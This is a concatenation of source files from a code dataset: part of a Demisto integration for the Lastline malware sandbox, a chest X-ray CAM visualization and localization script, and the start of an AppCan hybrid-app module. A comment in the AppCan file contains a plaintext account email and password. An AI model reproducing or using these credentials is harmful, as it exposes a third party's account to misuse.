hash_arg = argToList(self.command_params.get('file'))
for arg in hash_arg:
hash_type = hash_type_checker(arg)
self.command_params[hash_type] = arg
temp_result = self.http_request('/analysis/submit/file')
temp_human_readable, temp_context_entry = report_generator(temp_result)
human_readable += f'\n{temp_human_readable}'
context_entry['Lastline'].append(temp_context_entry.get('Lastline'))
context_entry['File'].append(temp_context_entry.get('File'))
context_entry['DBotScore'].append(temp_context_entry.get('DBotScore'))
result.append(temp_result)
del self.command_params[hash_type]
return human_readable, context_entry, result
def check_status(self):
result = self.http_request('/analysis/get')
human_readable, context_entry = report_generator(result)
return human_readable, context_entry, result
def get_report(self):
result = self.http_request('/analysis/get')
if 'data' in result and 'score' not in result['data']:
uuid = self.command_params.get('uuid')
raise DemistoException(f'task {uuid} is not ready')
human_readable, context_entry = report_generator(result)
return human_readable, context_entry, result
def get_task_list(self):
for param in ('before', 'after'):
if param in self.command_params:
self.command_params[param] = self.command_params[param].replace('T', ' ')
result = self.http_request('/analysis/get_completed')
if 'data' in result:
context_entry: List = self.get_status_and_time(argToList(result['data'].get('tasks')))
for i in range(len(context_entry)):
context_entry[i] = {
'UUID': context_entry[i][0],
'Time': context_entry[i][1],
'Status': context_entry[i][2]
}
human_readable = tableToMarkdown(name='tasks', t=context_entry, headers=['UUID', 'Time', 'Status'])
return human_readable, {}, result
def upload_file(self):
    """Upload a war-room file entry for detonation.

    The file's MD5 is precomputed and sent alongside the multipart upload;
    push_to_portal makes the submission visible in the Lastline portal.
    """
    entry_id = self.command_params.get('EntryID')
    self.command_params['push_to_portal'] = True
    file_params = demisto.getFilePath(entry_id)
    self.command_params['md5'] = file_hash(file_params.get('path'))
    result = self.http_request('/analysis/submit/file',
                               headers={'Content-Type': 'multipart/form-data'},
                               files={file_params.get('name'): file_params.get('path')})
    human_readable, context_entry = report_generator(result)
    return human_readable, context_entry, result
def upload_url(self):
    """Submit a URL for detonation and format the API reply."""
    response = self.http_request('/analysis/submit/url')
    readable, context = report_generator(response)
    return readable, context, response
def test_module_command(self):
    """Connectivity test: calling get_report without a 'uuid' should make the
    API complain about the missing field, which proves reachability and valid
    credentials."""
    try:
        self.get_report()
    except DemistoException as error:
        if str(error) == 'error Missing required field \'uuid\'.':
            return 'ok', {}, {}
        else:
            raise error
    # NOTE(review): if get_report somehow succeeds, execution falls through and
    # implicitly returns None — confirm that path is unreachable in practice.
def get_status_and_time(self, uuids) -> List[List]:
    """Return [uuid, submission-time (ISO 'T' form), status] for each task UUID.

    Issues one /analysis/get request per UUID; a task with a 'score' field is
    'Completed', otherwise 'Analyzing'.
    """
    task_list: List[List] = []
    for uuid in uuids:
        self.command_params['uuid'] = uuid
        result = self.http_request('/analysis/get')
        if 'data' in result:
            task_time = result['data'].get('submission')
            # NOTE(review): if 'submission' is missing, task_time is None and
            # the .replace below raises AttributeError — confirm the API always
            # includes it.
            if 'score' in result['data']:
                status = 'Completed'
            else:
                status = 'Analyzing'
        else:
            task_time = status = ''
        task_list.append([uuid, task_time.replace(' ', 'T'), status])
    return task_list
def http_request(self, path: str, headers=None, files=None) -> Dict:
    """POST *path* with the accumulated command parameters and validate the
    JSON reply via lastline_exception_handler before returning it."""
    result: Dict = self._http_request('POST', path, params=self.command_params, headers=headers, files=files)
    lastline_exception_handler(result)
    return result
def lastline_exception_handler(result: Dict):
    """Raise DemistoException when the Lastline API reply signals failure.

    A missing 'success' field means no usable response at all; success == 0
    means the API reported an error, whose code/message are forwarded.
    """
    success = result.get("success")
    if success is None:
        raise DemistoException('No response')
    if success == 0:
        error_msg = "error "
        if 'error_code' in result:
            error_msg += "(" + str(result['error_code']) + ") "
        if 'error' in result:
            error_msg += result['error']
        raise DemistoException(error_msg)
def hash_type_checker(hash_file: str) -> str:
    """Map the length of *hash_file* to its hash-algorithm name.

    Raises DemistoException for any length other than MD5/SHA1/SHA256.
    """
    length_to_type = {
        str(Client.MD5_LEN): 'md5',
        str(Client.SHA1_LEN): 'sha1',
        str(Client.SHA256_LEN): 'sha256',
    }
    detected = length_to_type.get(str(len(hash_file)))
    if detected is None:
        raise DemistoException(f'{INTEGRATION_NAME} File command support md5/ sha1/ sha256 only.')
    return detected
def report_generator(result: Dict, threshold=None):
    """Build the war-room markdown and context entry for a Lastline result.

    Args:
        result: raw JSON reply from the Lastline API (must contain 'data').
        threshold: optional malicious-score threshold forwarded to
            get_report_context.

    Returns:
        (human_readable, context_entry) tuple.
    """
    context_entry: Dict = get_report_context(result, threshold)
    if 'File' in context_entry:
        key = 'File'
    elif 'URL' in context_entry:
        key = 'URL'
    else:
        key = ''
    score = result['data'].get('score')
    uuid = result['data'].get('task_uuid')
    submission_time = result['data'].get('submission')
    # Bug fix: get_report_context only adds 'DBotScore' once a score has been
    # assigned, so the previous direct ['DBotScore'] lookup raised KeyError
    # for tasks that are still analyzing.
    indicator = context_entry.get('DBotScore', {}).get('Indicator')
    if score is not None:
        meta_data = f'**Score: {score}**\n\nTask UUID: {uuid}\nSubmission Time: {submission_time}'
    else:
        meta_data = '**Status: Analyzing**'
    human_readable = tableToMarkdown(name=f'Lastline analysis for {key.lower()}: {indicator}',
                                     metadata=meta_data,
                                     t=context_entry.get(key))
    return human_readable, context_entry
def get_report_context(result: Dict, threshold=None) -> Dict:
    """Translate a raw Lastline reply into a Demisto context dictionary.

    Produces 'Lastline' (submission metadata), 'File' or 'URL' (indicator
    details) and — only when a score exists — 'DBotScore'. Score mapping:
    > threshold -> 3 (malicious), > 30 -> 2 (suspicious), else 1 (benign).
    """
    key = 'File'
    context_entry: Dict = {}
    if 'data' in result:
        data: Dict = {}
        dbotscore: Dict = {
            'Vendor': 'Lastline',
            'Score': 0
        }
        if 'score' in result['data']:
            status = 'Completed'
            if threshold is None:
                threshold = Client.DEFAULT_THRESHOLD
            score = result['data']['score']
            if score > threshold:
                dbotscore['Score'] = 3
                data['Malicious'] = {
                    'Vendor': 'Lastline',
                    'Score': score
                }
            elif score > 30:
                dbotscore['Score'] = 2
            else:
                dbotscore['Score'] = 1
        else:
            status = 'Analyzing'
        lastline: Dict = {
            'Submission': {
                'Status': status,
                'UUID': result['data'].get('task_uuid'),
                'SubmissionTime': result['data'].get('submission')
            }
        }
        if 'analysis_subject' in result['data']:
            analysis_subject: Dict = result['data']['analysis_subject']
            temp_dict: Dict = {
                'YaraSignatures': analysis_subject.get('yara_signatures'),
                'DNSqueries': analysis_subject.get('dns_queries'),
                'NetworkConnections': analysis_subject.get('network_connections'),
                'DownloadedFiles': analysis_subject.get('downloaded_files'),
                'Process': analysis_subject.get('process'),
                'DomainDetections': analysis_subject.get('domain_detections'),
                'IPdetections': analysis_subject.get('ip_detections'),
                'URLdetections': analysis_subject.get('url_detections')
            }
            # keep only the keys the API actually populated
            temp_dict = {keys: values for keys, values in temp_dict.items() if values}
            lastline['Submission'].update(temp_dict)
            if 'url' in analysis_subject:
                key = 'URL'
                dbotscore['Indicator'] = analysis_subject['url']
                data['Data'] = analysis_subject.get('url')
            else:
                dbotscore['Indicator'] = analysis_subject.get('md5')
                dbotscore['Type'] = 'hash'
                data['MD5'] = analysis_subject.get('md5')
                data['SHA1'] = analysis_subject.get('sha1')
                data['SHA256'] = analysis_subject.get('sha256')
                data['Type'] = analysis_subject.get('mime_type')
        # overwrites the 'hash' type set above with 'File'/'URL'
        dbotscore['Type'] = key
        context_entry['Lastline'] = lastline
        context_entry[key] = data
        # DBotScore is deliberately omitted while the task is still analyzing
        if dbotscore['Score'] != 0:
            context_entry['DBotScore'] = dbotscore
    return context_entry
def file_hash(path: str) -> str:
    """Return the hex MD5 digest of the file at *path*, read in 64 KiB chunks."""
    digest = hashlib.md5()
    with open(path, 'rb') as handle:
        for chunk in iter(lambda: handle.read(65536), b''):
            digest.update(chunk)
    return digest.hexdigest()
def main():
    """Entry point: read the integration parameters, build the client, and
    dispatch the invoked command; all failures are reported via return_error."""
    params = demisto.params()
    base_url = params.get('url')
    verify_ssl = not params.get('insecure', False)
    proxy = params.get('proxy')
    api_params = {
        'key': params.get('api_key'),
        'api_token': params.get('api_token')
    }
    # command arguments are merged into the shared API parameter dict
    api_params.update(demisto.args())
    client = Client(base_url, api_params, verify=verify_ssl, proxy=proxy)
    command = demisto.command()
    demisto.debug(f'Command being called is {command}')
    # Switch case
    commands = {
        'test-module': Client.test_module_command,
        'file': Client.file,
        f'{INTEGRATION_COMMAND_NAME}-check-status': Client.check_status,
        f'{INTEGRATION_COMMAND_NAME}-get-report': Client.get_report,
        f'{INTEGRATION_COMMAND_NAME}-get-task-list': Client.get_task_list,
        f'{INTEGRATION_COMMAND_NAME}-upload-file': Client.upload_file,
        f'{INTEGRATION_COMMAND_NAME}-upload-url': Client.upload_url
    }
    try:
        if command in commands:
            # unbound method looked up on the class, called with the instance
            readable_output, outputs, raw_response = commands[command](client)
            return_outputs(readable_output, outputs, raw_response)
        else:
            raise DemistoException(f'{demisto.command()} is not a command')
    # Log exceptions
    except Exception as every_error:
        err_msg = f'Error in {INTEGRATION_NAME} Integration [{every_error}]'
        return_error(err_msg, error=every_error)


# Demisto runs integrations via exec(), so __name__ is 'builtins' (Py3)
# or '__builtin__' (Py2) rather than '__main__'.
if __name__ in ("__builtin__", "builtins"):
    main()
| [
"esahrf@paloaltonetworks.com"
] | esahrf@paloaltonetworks.com |
27b5cb328b18cf7b99b10672ad129945318772c3 | f150124bf523163bbdf26d99b3c67172e2d79df6 | /model/visualize_prediction.py | e9693add444fe891db63a9c8df3c5bec07f2fb39 | [
"MIT",
"BSD-3-Clause"
] | permissive | CAMP-eXplain-AI/CheXplain-IBA | 036a50633977de02e4810720095e7529819f4e53 | 8290f946e4b1f454eb350a6cfa4b38e79312b109 | refs/heads/master | 2023-06-27T20:58:48.820866 | 2021-03-31T13:32:43 | 2021-03-31T13:32:43 | 353,364,372 | 10 | 1 | null | null | null | null | UTF-8 | Python | false | false | 21,246 | py | from __future__ import print_function, division
# pytorch imports
import torch
from torchray.attribution.grad_cam import grad_cam
from torchvision import transforms
# image / graphics imports
from PIL import Image
from pylab import *
import seaborn as sns
import matplotlib.patches as patches
import matplotlib.pyplot as plt
# data science
import numpy as np
import pandas as pd
from scipy import ndimage
# import other modules
import cxr_dataset as CXR
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
def calc_cam(x, label, model):
    """
    Generate a class activation map (CAM) for a torch image tensor.

    Args:
        x: the 1x3x224x224 pytorch tensor that represents the NIH CXR
        label: user-supplied label to get the class activation map for; must
            be in the FINDINGS list
        model: densenet121 trained on NIH CXR data

    Returns:
        cam: numpy array with the class activation map at the convolutional
            feature-map resolution (not a torch tensor as the original note
            claimed; for a 224x224 input the DenseNet feature map is 7x7)
    """
    # NOTE(review): this list uses 'Infiltrate' while plot_map() uses
    # 'Infiltration' for the same position — confirm which spelling the
    # trained model/labels actually use.
    FINDINGS = [
        'Atelectasis',
        'Cardiomegaly',
        'Effusion',
        'Infiltrate',
        'Mass',
        'Nodule',
        'Pneumonia',
        'Pneumothorax',
        'Consolidation',
        'Edema',
        'Emphysema',
        'Fibrosis',
        'Pleural_Thickening',
        'Hernia']

    if label not in FINDINGS:
        raise ValueError(
            str(label) +
            "is an invalid finding - please use one of " +
            str(FINDINGS))

    # find index for label; this corresponds to index from output of net
    label_index = next(
        (x for x in range(len(FINDINGS)) if FINDINGS[x] == label))

    # define densenet_last_layer class so we can get last 1024 x 7 x 7 output
    # of densenet for class activation map
    class densenet_last_layer(torch.nn.Module):
        def __init__(self, model):
            super(densenet_last_layer, self).__init__()
            DenseNet_Module = list(model.children())[0]
            # keep all feature-extractor children except the last one
            # (presumably the final BatchNorm — confirm against the model)
            self.features = torch.nn.Sequential(
                *list(DenseNet_Module.children())[:-1]
            )

        def forward(self, x):
            x = self.features(x)
            x = torch.nn.functional.relu(x)
            return x

    # instantiate cam model and get output
    model_cam = densenet_last_layer(model)
    y = model_cam(x)
    y = y.cpu().data.numpy()
    y = np.squeeze(y)

    # pull weights corresponding to the 1024 layers from model
    weights = model.state_dict()['classifier.weight']
    weights = weights.cpu().numpy()
    bias = model.state_dict()['classifier.bias']
    bias = bias.cpu().numpy()

    # Calculating cams for all classes at the same time, however for the bounding box test data set
    # it would be of no use, since each image only has one class
    # weights = weights[:, :, np.newaxis, np.newaxis]
    # cams = np.multiply(weights, y)
    # cams = np.sum(cams, axis=1).squeeze()
    # bias = bias[:, np.newaxis, np.newaxis]
    # cams += bias
    # cam = cams[label_index]

    # CAM for the requested class: sum_k w_k * feature_map_k + bias
    class_weights = weights[label_index]
    class_weights = class_weights[:, np.newaxis, np.newaxis]
    cam = np.multiply(class_weights, y)
    cam = np.sum(cam, axis=0).squeeze()
    cam += bias[label_index]
    return cam
def load_data(
        PATH_TO_IMAGES,
        LABEL,
        PATH_TO_MODEL,
        fold,
        POSITIVE_FINDINGS_ONLY=None,
        covid=False):
    """
    Load the dataloader and the fine-tuned torchvision model.

    Args:
        PATH_TO_IMAGES: path to NIH CXR images
        LABEL: finding of interest (must exactly match one of the FINDINGS
            used elsewhere or downstream code will error)
        PATH_TO_MODEL: path to a downloaded pretrained model or your own
            retrained checkpoint
        fold: dataset fold to load
        POSITIVE_FINDINGS_ONLY: if True, the dataloader yields only examples
            positive for LABEL; otherwise positive and negative examples
        covid: use the Covid dataset variant (no bounding boxes)

    Returns:
        (dataloader iterator, model) tuple
    """
    # map_location forces CPU deserialization; the model is moved to `device` after
    checkpoint = torch.load(PATH_TO_MODEL, map_location=lambda storage, loc: storage)
    model = checkpoint['model']
    del checkpoint
    # unwrap DataParallel (.module) before placing on the target device
    model = model.module.to(device)
    # model.eval()
    # for param in model.parameters():
    #     param.requires_grad_(False)

    # build dataloader on test
    mean = [0.485, 0.456, 0.406]
    std = [0.229, 0.224, 0.225]
    data_transform = transforms.Compose([
        transforms.Resize(224),
        transforms.CenterCrop(224),
        transforms.ToTensor(),
        transforms.Normalize(mean, std)
    ])

    if not covid:
        # rescale ground-truth boxes from the 1024px originals to 224px inputs
        bounding_box_transform = CXR.RescaleBB(224, 1024)
        if not POSITIVE_FINDINGS_ONLY:
            finding = "any"
        else:
            finding = LABEL
        dataset = CXR.CXRDataset(
            path_to_images=PATH_TO_IMAGES,
            fold=fold,
            transform=data_transform,
            transform_bb=bounding_box_transform,
            finding=finding)
    else:
        dataset = CXR.CXRDataset(
            path_to_images=PATH_TO_IMAGES,
            fold=fold,
            transform=data_transform,
            fine_tune=True)

    dataloader = torch.utils.data.DataLoader(
        dataset, batch_size=1, shuffle=False, num_workers=1)
    return iter(dataloader), model
def show_next(cxr, model, label, inputs, filename, bbox):
    """
    Plot the CXR with its CAM heatmap, the ground-truth box and the detected
    activation regions, and print IoR / IoBB statistics.

    Args:
        cxr: de-normalized HxWx3 image for display
        model: fine-tuned torchvision densenet-121
        label: finding to compute the heatmap for
        inputs: normalized 1x3x224x224 input tensor
        filename: batch of image file names (first entry is used)
        bbox: ground-truth bounding box as (x, y, w, h) in 224px coordinates

    Returns:
        None (plots output)
    """
    raw_cam = calc_cam(inputs, label, model)
    print('range:')
    print(np.ptp(raw_cam))
    print('percerntile:')
    print(np.percentile(raw_cam, 4))
    print('avg:')
    print(np.mean(raw_cam))
    # upsample the coarse CAM to the 224x224 input resolution
    raw_cam = np.array(Image.fromarray(raw_cam.squeeze()).resize((224, 224), Image.NEAREST))

    # bounding box as a mask
    bbox_mask = np.zeros(raw_cam.shape, dtype=bool)
    bbox_mask[bbox[0, 1]: bbox[0, 1] + bbox[0, 3], bbox[0, 0]: bbox[0, 0] + bbox[0, 2]] = True
    bbox_area_ratio = (bbox_mask.sum() / bbox_mask.size) * 100

    # activation = CAM values outside the (60, 180) band; the band itself is
    # masked out of the heatmap overlay
    activation_mask = np.logical_or(raw_cam >= 180, raw_cam <= 60)
    heat_mask = np.logical_and(raw_cam < 180, raw_cam > 60)

    # finding components in heatmap
    label_im, nb_labels = ndimage.label(activation_mask)

    # build one rectangle patch per connected-component bounding slice
    object_slices = ndimage.find_objects(label_im)
    detected_patchs = []
    for object_slice in object_slices:
        y_slice = object_slice[0]
        x_slice = object_slice[1]
        xy_corner = (x_slice.start, y_slice.start)
        x_length = x_slice.stop - x_slice.start
        y_length = y_slice.stop - y_slice.start
        detected_patch = patches.Rectangle(xy_corner, x_length, y_length, linewidth=2, edgecolor='m',
                                           facecolor='none', zorder=2)
        detected_patchs.append(detected_patch)
        print(object_slice)

    # rectangular masks (one per detected component) and their union
    object_masks = []
    for object_slice in object_slices:
        object_mask = np.zeros(label_im.shape, dtype=bool)
        object_mask[object_slice[0], object_slice[1]] = True
        object_masks.append(object_mask)
    object_masks = np.array(object_masks)
    object_masks_union = np.logical_or.reduce(object_masks)

    def compute_ior(activated_mask, gt_mask):
        # intersection over the detected region's own area
        intersection_mask = np.logical_and(activated_mask, gt_mask)
        detected_region_area = np.sum(activated_mask)
        intersection_area = np.sum(intersection_mask)
        ior = intersection_area / detected_region_area
        return ior

    ior = compute_ior(activation_mask, bbox_mask)
    print('ior:')
    print(ior)
    iobb = compute_ior(object_masks_union, bbox_mask)
    print('iobb:')
    print(iobb)

    fig, (showcxr, heatmap) = plt.subplots(ncols=2, figsize=(14, 5))
    hmap = sns.heatmap(raw_cam.squeeze(),
                       cmap='viridis',
                       mask=heat_mask,
                       annot=False,
                       zorder=2,
                       linewidths=0)
    hmap.imshow(cxr, zorder=1)  # put the map under the heatmap
    hmap.axis('off')
    hmap.set_title('Own Implementation for category {}'.format(label), fontsize=8)
    # ground truth in red, detections in magenta
    rect = patches.Rectangle((bbox[0, 0], bbox[0, 1]), bbox[0, 2], bbox[0, 3], linewidth=2, edgecolor='r',
                             facecolor='none', zorder=2)
    hmap.add_patch(rect)
    for patch in detected_patchs:
        hmap.add_patch(patch)

    rect_original = patches.Rectangle((bbox[0, 0], bbox[0, 1]), bbox[0, 2], bbox[0, 3], linewidth=2, edgecolor='r',
                                      facecolor='none', zorder=2)
    showcxr.imshow(cxr)
    showcxr.axis('off')
    showcxr.set_title(filename[0])
    showcxr.add_patch(rect_original)
    # plt.savefig(str(LABEL+"_P"+str(predx[label_index])+"_file_"+filename[0]))
    plt.show()
def eval_localization(dataloader, model, LABEL, map_thresholds, percentiles, ior_threshold=0.1, method='ior'):
    """
    Evaluate CAM localization accuracy for one finding over a dataloader.

    A prediction counts as correct when its IoR/IoU/IoBB (depending on
    *method*) against the ground-truth box reaches *ior_threshold*.
    For the array-based methods the return value is a numpy array with one
    accuracy per entry of *map_thresholds* (or *percentiles*); for the
    '*_dynamic' methods it is a single scalar.
    """
    num_correct_pred = 0
    num_images_examined = 0

    def compute_ior(activated_masks, gt_mask):
        # intersection over the detected regions' own areas (vectorized over
        # the leading mask axis)
        intersection_masks = np.logical_and(activated_masks, gt_mask)
        detected_region_areas = np.sum(activated_masks, axis=(1, 2))
        intersection_areas = np.sum(intersection_masks, axis=(1, 2))
        ior = np.divide(intersection_areas, detected_region_areas)
        return ior

    def compute_iou(activated_masks, gt_mask):
        # classic intersection-over-union, vectorized over the leading axis
        intersection_masks = np.logical_and(activated_masks, gt_mask)
        union_masks = np.logical_or(activated_masks, gt_mask)
        intersection_areas = np.sum(intersection_masks, axis=(1, 2))
        union_areas = np.sum(union_masks, axis=(1, 2))
        iou = np.divide(intersection_areas, union_areas)
        return iou

    # shape the thresholds for broadcasting against stacked 224x224 maps
    map_thresholds = np.array(map_thresholds)
    map_thresholds = map_thresholds[:, np.newaxis, np.newaxis]

    for data in dataloader:
        inputs, labels, filename, bbox = data
        num_images_examined += 1

        # get cam map
        inputs = inputs.to(device)
        raw_cam = calc_cam(inputs, LABEL, model)
        raw_cam = np.array(Image.fromarray(raw_cam.squeeze()).resize((224, 224), Image.NEAREST))
        raw_cams = np.broadcast_to(raw_cam, shape=(len(map_thresholds), raw_cam.shape[0], raw_cam.shape[1]))
        # one binary activation mask per absolute threshold
        activation_masks = np.greater_equal(raw_cams, map_thresholds)

        # bounding box as a mask
        bbox = bbox.type(torch.cuda.IntTensor)
        bbox_mask = np.zeros(raw_cam.shape, dtype=bool)
        bbox_mask[bbox[0, 1]: bbox[0, 1] + bbox[0, 3], bbox[0, 0]: bbox[0, 0] + bbox[0, 2]] = True

        if method == 'iobb':
            # replace each activation mask by the union of its components'
            # rectangular bounding boxes before scoring
            object_masks_union_all_thresholds = []
            for activation_mask in activation_masks:
                label_im, nb_labels = ndimage.label(activation_mask)
                object_slices = ndimage.find_objects(label_im)
                object_masks = []
                for object_slice in object_slices:
                    object_mask = np.zeros(label_im.shape, dtype=bool)
                    object_mask[object_slice[0], object_slice[1]] = True
                    object_masks.append(object_mask)
                object_masks = np.array(object_masks)
                object_masks_union = np.logical_or.reduce(object_masks)
                object_masks_union_all_thresholds.append(object_masks_union)
            object_masks_union_all_thresholds = np.array(object_masks_union_all_thresholds)
            iobb = compute_ior(object_masks_union_all_thresholds, bbox_mask)
            num_correct_pred += np.greater_equal(iobb, ior_threshold)
        if method == 'ior':
            ior = compute_ior(activation_masks, bbox_mask)
            num_correct_pred += np.greater_equal(ior, ior_threshold)
        if method == 'ior_percentile_dynamic':
            # keep exactly as much CAM area as the ground-truth box occupies
            bbox_area_ratio = (bbox_mask.sum() / bbox_mask.size) * 100
            activation_mask = raw_cam >= np.percentile(raw_cam, (100 - bbox_area_ratio))
            intersection = np.logical_and(activation_mask, bbox_mask)
            ior = intersection.sum() / activation_mask.sum()
            num_correct_pred += np.greater_equal(ior, ior_threshold)
        if method == 'ior_percentile_static':
            activation_masks = []
            for percentile in percentiles:
                activation_mask = raw_cam >= np.percentile(raw_cam, 100 - percentile)
                activation_masks.append(activation_mask)
            activation_masks = np.array(activation_masks)
            ior = compute_ior(activation_masks, bbox_mask)
            num_correct_pred += np.greater_equal(ior, ior_threshold)
        if method == 'iou':
            iou = compute_iou(activation_masks, bbox_mask)
            num_correct_pred += np.greater_equal(iou, ior_threshold)
        if method == 'iou_percentile_dynamic':
            bbox_area_ratio = (bbox_mask.sum() / bbox_mask.size) * 100
            activation_mask = raw_cam >= np.percentile(raw_cam, (100 - bbox_area_ratio))
            intersection = np.logical_and(activation_mask, bbox_mask)
            union = np.logical_or(activation_mask, bbox_mask)
            iou = intersection.sum() / union.sum()
            num_correct_pred += np.greater_equal(iou, ior_threshold)
        if method == 'iou_percentile_static':
            activation_masks = []
            for percentile in percentiles:
                activation_mask = raw_cam >= np.percentile(raw_cam, 100 - percentile)
                activation_masks.append(activation_mask)
            activation_masks = np.array(activation_masks)
            iou = compute_iou(activation_masks, bbox_mask)
            num_correct_pred += np.greater_equal(iou, ior_threshold)
        if method == 'iou_percentile_bb_dynamic':
            # only components that touch the ground-truth box are kept
            bbox_area_ratio = (bbox_mask.sum() / bbox_mask.size) * 100
            activation_mask = raw_cam >= np.percentile(raw_cam, (100 - bbox_area_ratio))
            label_im, nb_labels = ndimage.label(activation_mask)
            object_slices = ndimage.find_objects(label_im)
            object_masks = []
            for object_slice in object_slices:
                object_mask = np.zeros(label_im.shape, dtype=bool)
                object_mask[object_slice[0], object_slice[1]] = True
                if (np.logical_and(object_mask, bbox_mask)).sum() > 0:
                    object_masks.append(object_mask)
            object_masks = np.array(object_masks)
            object_masks = np.logical_or.reduce(object_masks)
            intersection = np.logical_and(object_masks, bbox_mask)
            union = np.logical_or(object_masks, bbox_mask)
            iou = intersection.sum() / union.sum()
            num_correct_pred += np.greater_equal(iou, ior_threshold)
        if method == 'iou_percentile_bb_dynamic_nih':
            # NIH-style: score the single best-matching component (max IoU)
            bbox_area_ratio = (bbox_mask.sum() / bbox_mask.size) * 100
            activation_mask = raw_cam >= np.percentile(raw_cam, (100 - bbox_area_ratio))
            label_im, nb_labels = ndimage.label(activation_mask)
            object_slices = ndimage.find_objects(label_im)
            object_masks = []
            for object_slice in object_slices:
                object_mask = np.zeros(label_im.shape, dtype=bool)
                object_mask[object_slice[0], object_slice[1]] = True
                if (np.logical_and(object_mask, bbox_mask)).sum() > 0:
                    object_masks.append(object_mask)
            if len(object_masks) > 0:
                object_masks = np.array(object_masks)
                # object_masks = np.logical_or.reduce(object_masks)
                intersection = np.logical_and(object_masks, bbox_mask)
                union = np.logical_or(object_masks, bbox_mask)
                iou = intersection.sum(axis=(1, 2)) / union.sum(axis=(1, 2))
                iou = np.amax(iou)
                num_correct_pred += np.greater_equal(iou, ior_threshold)
        if method == 'ior_percentile_bb_dynamic_nih':
            # NIH-style IoR variant: best component by intersection-over-region
            bbox_area_ratio = (bbox_mask.sum() / bbox_mask.size) * 100
            activation_mask = raw_cam >= np.percentile(raw_cam, (100 - bbox_area_ratio))
            label_im, nb_labels = ndimage.label(activation_mask)
            object_slices = ndimage.find_objects(label_im)
            object_masks = []
            for object_slice in object_slices:
                object_mask = np.zeros(label_im.shape, dtype=bool)
                object_mask[object_slice[0], object_slice[1]] = True
                if (np.logical_and(object_mask, bbox_mask)).sum() > 0:
                    object_masks.append(object_mask)
            if len(object_masks) > 0:
                object_masks = np.array(object_masks)
                # object_masks = np.logical_or.reduce(object_masks)
                intersection = np.logical_and(object_masks, bbox_mask)
                # union = np.logical_or(object_masks, bbox_mask)
                iou = intersection.sum(axis=(1, 2)) / object_masks.sum(axis=(1, 2))
                iou = np.amax(iou)
                num_correct_pred += np.greater_equal(iou, ior_threshold)

    accuracy = num_correct_pred / num_images_examined
    return accuracy
def plot_map(model, dataloader, label=None, covid=False, saliency_layer=None):
    """Plot an example.

    Args:
        model: trained classification model
        dataloader: containing input images.
        label (str): Name of Category.
        covid: whether the image is from the Covid Dataset or the Chesxtray Dataset.
        saliency_layer: usually output of the last convolutional layer.
    """
    if not covid:
        FINDINGS = [
            'Atelectasis',
            'Cardiomegaly',
            'Effusion',
            'Infiltration',
            'Mass',
            'Nodule',
            'Pneumonia',
            'Pneumothorax',
            'Consolidation',
            'Edema',
            'Emphysema',
            'Fibrosis',
            'Pleural_Thickening',
            'Hernia']
    else:
        FINDINGS = [
            'Detector01',
            'Detector2',
            'Detector3']

    try:
        # the Covid dataset yields no bounding boxes
        if not covid:
            inputs, labels, filename, bbox = next(dataloader)
            bbox = bbox.type(torch.cuda.IntTensor)
        else:
            inputs, labels, filename = next(dataloader)
    except StopIteration:
        print("All examples exhausted - rerun cells above to generate new examples to review")
        return None

    original = inputs.clone()
    inputs = inputs.to(device)
    original = original.to(device)
    original.requires_grad = True  # gradients are needed for grad-cam

    # create predictions for label of interest and all labels
    pred = torch.sigmoid(model(original)).data.cpu().numpy()[0]
    predx = ['%.3f' % elem for elem in list(pred)]

    preds_concat = pd.concat([pd.Series(FINDINGS), pd.Series(predx), pd.Series(labels.numpy().astype(bool)[0])], axis=1)
    preds = pd.DataFrame(data=preds_concat)
    preds.columns = ["Finding", "Predicted Probability", "Ground Truth"]
    preds.set_index("Finding", inplace=True)
    preds.sort_values(by='Predicted Probability', inplace=True, ascending=False)

    # undo ImageNet normalization for display
    cxr = inputs.data.cpu().numpy().squeeze().transpose(1, 2, 0)
    mean = np.array([0.485, 0.456, 0.406])
    std = np.array([0.229, 0.224, 0.225])
    cxr = std * cxr + mean
    cxr = np.clip(cxr, 0, 1)

    if not covid:
        show_next(cxr, model, label, inputs, filename, bbox)

    # default to the first ground-truth-positive finding on Covid data
    if covid and label is None:
        label = preds.loc[preds["Ground Truth"]==True].index[0]

    category_id = FINDINGS.index(label)
    saliency = grad_cam(model, original, category_id, saliency_layer=saliency_layer)

    fig, (showcxr, heatmap) = plt.subplots(ncols=2, figsize=(14, 5))
    showcxr.imshow(cxr)
    showcxr.axis('off')
    showcxr.set_title(filename[0])
    if not covid:
        rect_original = patches.Rectangle((bbox[0, 0], bbox[0, 1]), bbox[0, 2], bbox[0, 3], linewidth=2, edgecolor='r',
                                          facecolor='none', zorder=2)
        showcxr.add_patch(rect_original)

    hmap = sns.heatmap(saliency.detach().cpu().numpy().squeeze(),
                       cmap='viridis',
                       annot=False,
                       zorder=2,
                       linewidths=0)
    hmap.axis('off')
    hmap.set_title('TorchRay grad cam for category {}'.format(label), fontsize=8)
    plt.show()

    print(preds)
    if covid:
        # look up the radiologist Brixia score for this image; scores are
        # stored as an integer, so left-pad back to six region digits
        data_brixia = pd.read_csv("model/labels/metadata_global_v2.csv", sep=";")
        data_brixia.set_index("Filename", inplace=True)
        score = data_brixia.loc[filename[0].replace(".jpg", ".dcm"), "BrixiaScore"].astype(str)
        print('Brixia 6 regions Score: ', '0' * (6 - len(score)) + score)
| [
"wejdene.mansour@tum.de"
] | wejdene.mansour@tum.de |
8e74721036b29b8a8216fad57f39683db7962052 | f1e977eeda53904e918a870e2d835c28d99240e5 | /libs/modules/Appcan/Appcan_webapp.py | be53ed81cb0222c9cadc5ea44869d712a9b013a3 | [] | no_license | beizishaozi/HyBridApp | 263e7f0d726647eb5ae45f362e9fd8a9a64847a5 | a2d2585c77601b88ceaf3ace51752b4a19cec397 | refs/heads/master | 2023-01-28T11:15:44.428354 | 2020-12-04T11:41:20 | 2020-12-04T11:41:20 | 316,420,979 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,344 | py | #!/usr/bin/env python3
import logging
import sys
import jpype
import zipfile
import shutil
try:
import xml.etree.cElementTree as ET
except ImportError:
import xml.etree.ElementTree as ET
import os
from libs.modules.BaseModule import BaseModule
'''reference libs modules need to put the directory of this project in $path variable'''
# Log to stdout at INFO level for this whole module.
logging.basicConfig(stream=sys.stdout, format="%(levelname)s: %(message)s", level=logging.INFO)
log = logging.getLogger(__name__)
# NOTE(review): the reference string below contains committed credentials
# (username/password); they should be removed from source control.
'''
Reference:
1) http://newdocx.appcan.cn/quickstart/create-app //username=984363019@qq.com passwd=beizishaozi
'''
class Appcan(BaseModule):
    """Detector/extractor for AppCan hybrid apps (web assets live under assets/widget/)."""

